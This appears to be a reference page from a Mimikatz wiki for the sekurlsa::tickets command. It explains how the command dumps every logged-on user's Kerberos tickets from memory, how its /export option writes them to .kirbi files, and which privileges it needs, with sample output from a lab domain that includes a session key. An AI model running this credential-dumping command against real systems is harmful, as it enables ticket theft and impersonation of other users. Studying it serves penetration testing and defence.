tickets

Search…
tickets
sekurlsa::tickets lists Kerberos tickets belonging to all authenticated users on the target server/workstation. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. Sekurlsa can also access tickets of others sessions (users). It has the following command line argument:
/export: tickets are exported in .kirbi files. They start with user's LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT). The tickets are saved in the current directory.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # sekurlsa::tickets
2
​
3
Authentication Id : 0 ; 697146 (00000000:000aa33a)
4
Session           : Service from 0
5
User Name         : MediaAdmin$
6
Domain            : hacklab
7
Logon Server      : DC
8
Logon Time        : 10/17/2021 4:22:01 AM
9
SID               : S-1-5-21-2725560159-1428537199-2260736313-1427
10
​
11
         * Username : MediaAdmin$
12
         * Domain   : HACKLAB.LOCAL
13
         * Password : (null)
14
​
15
        Group 0 - Ticket Granting Service
16
​
17
        Group 1 - Client Ticket ?
18
​
19
        Group 2 - Ticket Granting Ticket
20
         [00000000]
21
           Start/End/MaxRenew: 10/17/2021 4:22:01 AM ; 10/17/2021 2:22:01 PM ; 10/24/2021 4:22:01 AM
22
           Service Name (02) : krbtgt ; HACKLAB.LOCAL ; @ HACKLAB.LOCAL
23
           Target Name  (02) : krbtgt ; hacklab.local ; @ HACKLAB.LOCAL
24
           Client Name  (01) : MediaAdmin$ ; @ HACKLAB.LOCAL ( hacklab.local )
25
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
26
           Session Key       : 0x00000012 - aes256_hmac
27
             1351322f734539c08a78792f642fc4fd4ff8aea1fe3b4a0edf83778b5ed878e9
28
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
Copied!
ssp
trust
Last modified 6mo ago
Copy link